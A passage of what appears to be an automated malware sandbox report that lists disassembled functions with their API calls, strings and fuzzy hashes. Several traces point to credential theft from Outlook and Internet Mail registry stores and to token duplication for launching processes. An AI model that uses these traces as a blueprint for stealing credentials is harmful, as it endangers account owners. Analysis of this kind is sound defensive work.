                                                          • CreateProcessWithTokenW.ADVAPI32(?,00000001,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 002A7F9E
                                                          • CloseHandle.KERNEL32(00000000), ref: 002A7FA5
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 002A7FB7
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ProcessToken$CloseCreateHandleOpenProcess32$DuplicateFileFirstH_prologModuleNameNextSnapshotToolhelp32With_mbstowcs_strlen
                                                          • String ID:
                                                          • API String ID: 1291480875-0
                                                          • Opcode ID: f875fd719ce63dc9f3b2f3ca8943eb3c288a7b9e713d4f353f7d0e8762720aca
                                                          • Instruction ID: b3bf2370dccd7e5b5b00352d5248493e37fdc5f3d4dfb09c0671c3e82f0b823e
                                                          • Opcode Fuzzy Hash: f875fd719ce63dc9f3b2f3ca8943eb3c288a7b9e713d4f353f7d0e8762720aca
                                                          • Instruction Fuzzy Hash: 4741AC72A14209AFDB11DFA4CD85AFEB7BCEF05304F0080A9F545A6151EBB48E58CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D15C8, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 002D160C
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0981
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0993
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09A5
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09B7
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09C9
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09DB
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09ED
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D09FF
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A11
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A23
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A35
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A47
                                                            • Part of subcall function 002D0964: _free.LIBCMT ref: 002D0A59
                                                          • _free.LIBCMT ref: 002D1601
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002D1623
                                                          • _free.LIBCMT ref: 002D1638
                                                          • _free.LIBCMT ref: 002D1643
                                                          • _free.LIBCMT ref: 002D1665
                                                          • _free.LIBCMT ref: 002D1678
                                                          • _free.LIBCMT ref: 002D1686
                                                          • _free.LIBCMT ref: 002D1691
                                                          • _free.LIBCMT ref: 002D16C9
                                                          • _free.LIBCMT ref: 002D16D0
                                                          • _free.LIBCMT ref: 002D16ED
                                                          • _free.LIBCMT ref: 002D1705
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 56f108b104f4bd08857ad19b5f9be97a79e04d7868320b59dbac2420280a124d
                                                          • Instruction ID: 412c95fdaa5e2aec9d0d021fd17cd1496138c4af3fd9dd4e6175eff859711d92
                                                          • Opcode Fuzzy Hash: 56f108b104f4bd08857ad19b5f9be97a79e04d7868320b59dbac2420280a124d
                                                          • Instruction Fuzzy Hash: 69313D71624702AFEB21AE39D945B9A73E9AB00310F18492BE069D7691DF70EE70CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00434048, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 99stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00433860: lstrlenW.KERNEL32(?,?,004340B2), ref: 00433884
                                                            • Part of subcall function 00433860: lstrcpyW.KERNEL32(00000000,?), ref: 0043389B
                                                            • Part of subcall function 00433860: CoTaskMemFree.OLE32(?), ref: 004338A4
                                                          • lstrcmpiW.KERNEL32(00000000,identification,00000000), ref: 004340CA
                                                          • lstrcmpiW.KERNEL32(?,identitymgr), ref: 004340D8
                                                          • lstrcmpiW.KERNEL32(00000000,inetcomm server passwords), ref: 004340F8
                                                          • lstrcmpiW.KERNEL32(00000000,outlook account manager passwords), ref: 00434104
                                                          • lstrcmpiW.KERNEL32(00000000,identities), ref: 00434110
                                                          • CoTaskMemFree.OLE32(?), ref: 00434146
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: lstrcmpi$FreeTask$lstrcpylstrlen
                                                          • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                          • API String ID: 1606502731-4287852900
                                                          • Opcode ID: d14e761c7d8a1d045213e32d58849b77d1cbff6592ac36b5b3dc77f4321a9a99
                                                          • Instruction ID: ea6e2508af5b77f0c2dcd447bc0e5f2d542f2261cbd863cfbdf332444163c38f
                                                          • Opcode Fuzzy Hash: d14e761c7d8a1d045213e32d58849b77d1cbff6592ac36b5b3dc77f4321a9a99
                                                          • Instruction Fuzzy Hash: E831917590061ABBCF119F95CC859EF7B79EF98714F20401AF80462241EB78EE50DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00460812, Relevance: 18.4, APIs: 12, Instructions: 374COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 71a17bab1d9b45fc4fab3f696bb28751c02b4ed8ec655c75b391e0d58eb48832
                                                          • Instruction ID: 31c3d1921f74f22e91196dce9a62c16d796788573d1290272836183a028f5f12
                                                          • Opcode Fuzzy Hash: 71a17bab1d9b45fc4fab3f696bb28751c02b4ed8ec655c75b391e0d58eb48832
                                                          • Instruction Fuzzy Hash: 5FC14372D40204ABDB20DBA8DC82FDF77F99F08705F14406AFE05FB292E6749A458B65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B33D8, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 002B34D3
                                                          • type_info::operator==.LIBVCRUNTIME ref: 002B34FA
                                                          • ___TypeMatch.LIBVCRUNTIME ref: 002B3606
                                                          • CatchIt.LIBVCRUNTIME ref: 002B365B
                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 002B36E1
                                                          • _UnwindNestedFrames.LIBCMT ref: 002B3768
                                                          • CallUnexpected.LIBVCRUNTIME ref: 002B3783
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 4234981820-393685449
                                                          • Opcode ID: b800c5059ad003b03a5ceefb9984c8ea34816e5fab1e32f9878bf2c4a4020ef5
                                                          • Instruction ID: b0c0d2658364126442b1b954ff6cbcca24878bbcca27964d531945c5a2ce7456
                                                          • Opcode Fuzzy Hash: b800c5059ad003b03a5ceefb9984c8ea34816e5fab1e32f9878bf2c4a4020ef5
                                                          • Instruction Fuzzy Hash: 57C15EB182020AEFCF25DF94C8819EEBBB5BF18390F14455AE8156B212D735EB61CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C94FD, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3907804496
                                                          • Opcode ID: 2ac855065411ae53f348d3af45cd8e1788b59200d8bdb34c72b0b17468bcc7e8
                                                          • Instruction ID: 05e60e0d39989271ebb880aca7e6937c2333fcfce64cb01373433ac7fdfad49e
                                                          • Opcode Fuzzy Hash: 2ac855065411ae53f348d3af45cd8e1788b59200d8bdb34c72b0b17468bcc7e8
                                                          • Instruction Fuzzy Hash: D9C1E2B0E242469FDF16DFA8D888FADBBB4AF49300F14425DE4459B292C7709DA1CF64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002AC965, Relevance: 16.7, APIs: 11, Instructions: 184fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 002AC979
                                                          • GetFileSize.KERNEL32(?,00000000,?,?), ref: 002AC9F9
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 002ACA10
                                                          • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 002ACA23
                                                          • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 002ACA30
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002ACA43
                                                          • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 002ACA64
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002ACA77
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$PointerRead$HandleInformationSize
                                                          • String ID:
                                                          • API String ID: 2979504256-0
                                                          • Opcode ID: 24bb44d9113fb0c8713bfba4d180ac9ba3e3f5af3796c2025d8a7695a6300c9a
                                                          • Instruction ID: 07f945c13268efa495c47c6e1e57746ad0d1b747dd66dfcc5e377f1428aa63bc
                                                          • Opcode Fuzzy Hash: 24bb44d9113fb0c8713bfba4d180ac9ba3e3f5af3796c2025d8a7695a6300c9a
                                                          • Instruction Fuzzy Hash: EE5185B1A10219BFEB14DF64DC95FBEB7B9EB45704F244529F906E7281DA70DD008B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043C715, Relevance: 16.7, APIs: 11, Instructions: 184fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileInformationByHandle.KERNEL32(?,?), ref: 0043C729
                                                          • GetFileSize.KERNEL32(?,00000000,?,?), ref: 0043C7A9
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0043C7C0
                                                          • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0043C7D3
                                                          • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 0043C7E0
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0043C7F3
                                                          • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 0043C814
                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0043C827
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$PointerRead$HandleInformationSize
                                                          • String ID:
                                                          • API String ID: 2979504256-0
                                                          • Opcode ID: 24bb44d9113fb0c8713bfba4d180ac9ba3e3f5af3796c2025d8a7695a6300c9a
                                                          • Instruction ID: 4819b7e0eebd8a021cf4598638bab03821800136742b4a6dbd386935a6c5fd4e
                                                          • Opcode Fuzzy Hash: 24bb44d9113fb0c8713bfba4d180ac9ba3e3f5af3796c2025d8a7695a6300c9a
                                                          • Instruction Fuzzy Hash: C25173B1A00218BBEB18DF68CCD1BBFB7B9EB48700F11442EF905E7281D6749E048B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A407A, Relevance: 15.1, APIs: 10, Instructions: 102stringregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A40A1
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002A40CC
                                                          • lstrlenW.KERNEL32(?), ref: 002A40E3
                                                          • lstrlenW.KERNEL32(?), ref: 002A40F0
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 002A4111
                                                          • lstrcatW.KERNEL32(00000000,0047DE0C), ref: 002A411D
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 002A412B
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 002A4137
                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 002A4171
                                                          • RegCloseKey.ADVAPI32(?), ref: 002A4186
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrcat$Enumlstrlen$CloseOpenlstrcpy
                                                          • String ID:
                                                          • API String ID: 3646165539-0
                                                          • Opcode ID: ef13aab4a754b04edc502678e35ace905abc72a481f7eca412c42ce53feffe91
                                                          • Instruction ID: f19c671f281d6d3a25d31d00d8191296291df2de443e1326206fa3500d739f99
                                                          • Opcode Fuzzy Hash: ef13aab4a754b04edc502678e35ace905abc72a481f7eca412c42ce53feffe91
                                                          • Instruction Fuzzy Hash: DE315E7191014ABBDB21AF91DC88EFF7BBCEF86744F04006AF945E2110EBB49A51DE61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C6D63, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 002C6D79
                                                            • Part of subcall function 002C7C93: HeapFree.KERNEL32(00000000,00000000), ref: 002C7CA9
                                                            • Part of subcall function 002C7C93: GetLastError.KERNEL32(?,?,002D10BB,?,00000000,?,00000002,?,002D135E,?,00000007,?,?,002D175F,?,?), ref: 002C7CBB
                                                          • _free.LIBCMT ref: 002C6D85
                                                          • _free.LIBCMT ref: 002C6D90
                                                          • _free.LIBCMT ref: 002C6D9B
                                                          • _free.LIBCMT ref: 002C6DA6
                                                          • _free.LIBCMT ref: 002C6DB1
                                                          • _free.LIBCMT ref: 002C6DBC
                                                          • _free.LIBCMT ref: 002C6DC7
                                                          • _free.LIBCMT ref: 002C6DD2
                                                          • _free.LIBCMT ref: 002C6DE0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: a0349055a610152e2160e2e25f2ed60e5143927299a42cfb61f19bb47e3066c8
                                                          • Instruction ID: 37030687f84b75cf2ee29b3d000a6f29e957bd449986603767a9d1bc211402fc
                                                          • Opcode Fuzzy Hash: a0349055a610152e2160e2e25f2ed60e5143927299a42cfb61f19bb47e3066c8
                                                          • Instruction Fuzzy Hash: 55219676914109AFCB41EF94C885FDE7BBAAF08340B0586AAF5159B121DB71EB54CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00456B13, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00456B29
                                                            • Part of subcall function 00457A43: HeapFree.KERNEL32(00000000,00000000), ref: 00457A59
                                                            • Part of subcall function 00457A43: GetLastError.KERNEL32(?,?,00460E6B,?,00000000,?,00000002,?,0046110E,?,00000007,?,?,0046150F,?,?), ref: 00457A6B
                                                          • _free.LIBCMT ref: 00456B35
                                                          • _free.LIBCMT ref: 00456B40
                                                          • _free.LIBCMT ref: 00456B4B
                                                          • _free.LIBCMT ref: 00456B56
                                                          • _free.LIBCMT ref: 00456B61
                                                          • _free.LIBCMT ref: 00456B6C
                                                          • _free.LIBCMT ref: 00456B77
                                                          • _free.LIBCMT ref: 00456B82
                                                          • _free.LIBCMT ref: 00456B90
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: a0349055a610152e2160e2e25f2ed60e5143927299a42cfb61f19bb47e3066c8
                                                          • Instruction ID: e7f7c3b33883ff2f87d94819f6f4b5fba99c98c01bf7f23fa25dd3ec272a9191
                                                          • Opcode Fuzzy Hash: a0349055a610152e2160e2e25f2ed60e5143927299a42cfb61f19bb47e3066c8
                                                          • Instruction Fuzzy Hash: A1210C76904108AFCB01EF95D841DDD7BBABF08305F00406AF905AB523DB75DB48CB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C5A49, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • _memcmp.LIBVCRUNTIME ref: 002C5CE2
                                                          • _free.LIBCMT ref: 002C5D56
                                                          • _free.LIBCMT ref: 002C5D6F
                                                          • _free.LIBCMT ref: 002C5DAD
                                                          • _free.LIBCMT ref: 002C5DB6
                                                          • _free.LIBCMT ref: 002C5DC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_memcmp
                                                          • String ID: @$C
                                                          • API String ID: 4275183328-2800433787
                                                          • Opcode ID: 9609f8ecaee2ddcd92065e9f00fc798942bdd3764a7e011d05c80e2f253d6cf8
                                                          • Instruction ID: b74b1d2d6c591170cda8b4d33b65a651840d48a88fe8debbc81dd7afdc47a0fd
                                                          • Opcode Fuzzy Hash: 9609f8ecaee2ddcd92065e9f00fc798942bdd3764a7e011d05c80e2f253d6cf8
                                                          • Instruction Fuzzy Hash: B4B13D7591162A9BDB24DF18C888FADB7B5FF18304F1446AED90AA7350D771AEA0CF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00294220, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00294225
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0029432F
                                                          • CloseHandle.KERNEL32(00000000), ref: 0029433E
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00294383
                                                          • ReadFile.KERNEL32(00000010,00000000,00000000,?,00000000), ref: 002943AE
                                                          • CloseHandle.KERNEL32(00000010), ref: 002943B5
                                                            • Part of subcall function 00279182: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 002791AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteH_prologReadSizeTransacted
                                                          • String ID: 4dUGGC[FP$H
                                                          • API String ID: 169828681-740961807
                                                          • Opcode ID: dfa44fa4fc78a741c601703542493e87ecb13f4b951100538cd2551953e87cb8
                                                          • Instruction ID: 8f654fabcf0a7be91c9cb55109d6c2ed838ddfbe31005650d1123156ebcddb45
                                                          • Opcode Fuzzy Hash: dfa44fa4fc78a741c601703542493e87ecb13f4b951100538cd2551953e87cb8
                                                          • Instruction Fuzzy Hash: 2D91EF70C15288DBDF10EFE4C991BEEFBB8AF59300F2081A9E44967242DB741A59CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043C600, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                          • API String ID: 4218353326-51310709
                                                          • Opcode ID: d7377db76e57f3abe6afd4351dc2a60a8dc00ad3f9d90573d3f2e69f919c5700
                                                          • Instruction ID: a127ded24830ba1693e361c09d2fd0cbcec2f57ce5ccc690c1097d41bb80f951
                                                          • Opcode Fuzzy Hash: d7377db76e57f3abe6afd4351dc2a60a8dc00ad3f9d90573d3f2e69f919c5700
                                                          • Instruction Fuzzy Hash: BD117327248B1374253D3127BC43B9B02885E4A7B6B3536BFEC08751C2EE8CD586466E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D0E82, Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: a954ffe669dd913762c01ae95947159b34e9ef56744b357be3fb4c0f092cbf71
                                                          • Instruction ID: 622dd9882c4866b04df3e1930c39ff4931f1d557df7d354076604312dd42d40a
                                                          • Opcode Fuzzy Hash: a954ffe669dd913762c01ae95947159b34e9ef56744b357be3fb4c0f092cbf71
                                                          • Instruction Fuzzy Hash: 4761F671924702AFD720EF64C881FAAB7E9EB44310F24456EE955EB381EB709D51CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00460C32, Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 07ad0a594bca632071efa0f775702c8b7bdfab4bacb7738a4e320e00e56d55e9
                                                          • Instruction ID: 47f428db35c09ef3d5ae4a448a983040ed613319d707040ca90e1f27d4caf2c0
                                                          • Opcode Fuzzy Hash: 07ad0a594bca632071efa0f775702c8b7bdfab4bacb7738a4e320e00e56d55e9
                                                          • Instruction Fuzzy Hash: 1461E372900700AFDB20DF64D881BABB7E9AF44714F10456FE845EB282FB34AE418B55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00289B52, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 192filetimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wsprintfA.USER32 ref: 00289C73
                                                          • wsprintfA.USER32 ref: 00289C94
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 00289CC3
                                                          • WriteFile.KERNEL32(?,?,00000000,000000FF,00000000), ref: 00289D35
                                                          • SetFileTime.KERNEL32(?,?,?,?), ref: 00289D6F
                                                          • CloseHandle.KERNEL32(?), ref: 00289D7F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$wsprintf$CloseCreateHandleTimeWrite
                                                          • String ID: :
                                                          • API String ID: 1593831391-336475711
                                                          • Opcode ID: 08dac24a5a159d556da66e79bb6d8681bcdd114767d2757632b83f214537d80b
                                                          • Instruction ID: 46b5fede49e494f8bc7e7f0e1fbe6da878129d5acda5901b13b9d916a32bf590
                                                          • Opcode Fuzzy Hash: 08dac24a5a159d556da66e79bb6d8681bcdd114767d2757632b83f214537d80b
                                                          • Instruction Fuzzy Hash: CB615838116208AFCB20FF68C8C4BF977A9AF45304F18446AE486972D1D7719EE5CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C55BE, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$AllocateHeap
                                                          • String ID: T!G$p!G
                                                          • API String ID: 3033488037-1934873081
                                                          • Opcode ID: db9ee025cafd032e7ba6a278fdba48eef0a3fcf246447f38eb2ec08cba10518b
                                                          • Instruction ID: 95b74f98ae1bd6caa35091e6507d7e040b265dbf8c65eb0ea755af221475c939
                                                          • Opcode Fuzzy Hash: db9ee025cafd032e7ba6a278fdba48eef0a3fcf246447f38eb2ec08cba10518b
                                                          • Instruction Fuzzy Hash: 2951D331A20B15AFDB209F29CD41FAAB7F9EF14720B54466DE409D7250E771EAA18F40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00294DCE, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: -4(F$Inuh$RTV$`G\A$c~mk$i
                                                          • API String ID: 3519838083-4182963312
                                                          • Opcode ID: 507249c7fd3dd50d072b95c7e33e663fa1ab5548a990a6c3d8bb385953a0601c
                                                          • Instruction ID: 3db9999d0e2a63059511a55f5cbacdc08ef4621ef8b5174940eef2b189df9a12
                                                          • Opcode Fuzzy Hash: 507249c7fd3dd50d072b95c7e33e663fa1ab5548a990a6c3d8bb385953a0601c
                                                          • Instruction Fuzzy Hash: D9818970C152889ADF05DFE8DA915EDFBB4BF6A304F1042ADD88937212EB740789CB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00424B7E, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: -4(F$Inuh$RTV$`G\A$c~mk$i
                                                          • API String ID: 3519838083-4182963312
                                                          • Opcode ID: aa2b085fdf2609a9e480d881c39803dfbd2b060127195f3e5c3b72344b899cdc
                                                          • Instruction ID: 3f24401d36f8c6b371c280579d154ea7624f7e4840d86d4d1ea5f4ad863ab821
                                                          • Opcode Fuzzy Hash: aa2b085fdf2609a9e480d881c39803dfbd2b060127195f3e5c3b72344b899cdc
                                                          • Instruction Fuzzy Hash: 73818D74C01298DADB15CFE9DA911ECFBB0BF6A308F5042AED84537252EB780789CB14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A3B53, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 71libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?), ref: 002A3B92
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 002A3BCD
                                                          • FreeLibrary.KERNEL32(00000000), ref: 002A3C01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: !$0%*'$8%24$y3;;
                                                          • API String ID: 145871493-1146062926
                                                          • Opcode ID: 9b3085ccee81037ee7edb606e98dc4e4002f8f49fc1dc6b80cb0a7de191f8578
                                                          • Instruction ID: 414bb16a8fc6aee0b86b018ffad17e77245668b8e10f099df19b5482781cee5c
                                                          • Opcode Fuzzy Hash: 9b3085ccee81037ee7edb606e98dc4e4002f8f49fc1dc6b80cb0a7de191f8578
                                                          • Instruction Fuzzy Hash: D621F931914299EF9B05CFE89C908FFFBBAAE4A34471441ADE441B3201DF709B05CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A7D7C, Relevance: 12.1, APIs: 8, Instructions: 65memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 002A7D8E
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 002A7D95
                                                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 002A7DAF
                                                          • GetLastError.KERNEL32 ref: 002A7DB9
                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 002A7DC9
                                                          • GetTokenInformation.ADVAPI32(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 002A7DDD
